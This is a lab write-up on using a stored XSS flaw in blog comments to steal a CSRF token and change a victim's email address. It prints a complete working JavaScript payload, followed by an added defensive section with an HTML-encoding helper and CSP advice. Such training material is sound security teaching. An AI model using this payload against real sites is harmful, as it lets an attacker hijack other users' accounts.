LAB 24 - Exploiting XSS to bypass CSRF defenses
Initial instructions
This lab contains a stored XSS vulnerability in the blog comments function. To solve the lab, exploit the vulnerability to steal a CSRF token, which you can then use to change the email address of someone who views the blog post comments.
You can log in to your own account using the following credentials: wiener:peter
First, I logged in as wiener to see which functions are available in the account panel. The email address can be updated there, and that update sends a POST request to /my-account/change-email, carrying a csrf parameter along with the new email.

Knowing this, I built the following payload:
```html
<script>
// Runs in the victim's browser, on the lab's origin, so it can read
// the victim's own account page (and the CSRF token embedded in it).
var req = new XMLHttpRequest();
req.onload = handleResponse;
req.open('get','/my-account',true);
req.send();
function handleResponse() {
// Pull the per-session CSRF token out of the change-email form.
var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1];
// Replay the same POST the form would send, with the stolen token.
var changeReq = new XMLHttpRequest();
changeReq.open('post', '/my-account/change-email', true);
changeReq.send('csrf='+token+'&email=test@test.com')
};
</script>
```
I then injected it into the comment body field when posting a comment. The CSRF token itself is never the problem here: because the stored script executes on the same origin as the victim's session, it can simply read the token and reuse it, which is why a stored XSS defeats token-based CSRF protection outright.
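For the defending side, the root cause is that the comment body is written into the page unencoded. Below is an added example (not code from the lab or from PortSwigger) showing the fix: contextual HTML encoding of the stored comment before rendering, checked against the payload from this writeup. escapeHtml, renderComment and containsScriptTag are hypothetical helper names.

```javascript
// Added example: encode untrusted comment text for an HTML text context.
// escapeHtml() and renderComment() are hypothetical helpers, not lab code.

function escapeHtml(untrusted) {
  // Encode every character that can open a tag, close an attribute,
  // or introduce an entity, so the browser treats the input as text only.
  return String(untrusted)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

function renderComment(author, body) {
  // Both fields are attacker-controlled and land in an HTML text context,
  // so both are encoded. The template itself stays static.
  return '<div class="comment"><b>' + escapeHtml(author) + '</b>: ' +
         escapeHtml(body) + '</div>';
}

// Regression check: rendered comment markup must never contain a live
// <script> tag (or any other tag) that originated from user input.
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Constructed sample: the stored payload from this writeup, as it would
// be saved in the comments table (abbreviated body, same shape).
const STORED_PAYLOAD =
  '<script>var req = new XMLHttpRequest();' +
  'req.open("get","/my-account",true);req.send();</script>';

// Without encoding the tag survives; with encoding it becomes inert text.
const rendered = renderComment('attacker', STORED_PAYLOAD);
console.log(containsScriptTag(STORED_PAYLOAD)); // true: raw payload is live
console.log(containsScriptTag(rendered));       // false: encoded on output
```

Encoding is context-specific: this helper is correct for HTML body and quoted-attribute contexts only, and a comment that is later placed inside a script block, a URL, or a CSS value needs the encoding for that context instead. A Content Security Policy that disallows inline scripts is a useful second layer, since it would also have stopped this payload from executing.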
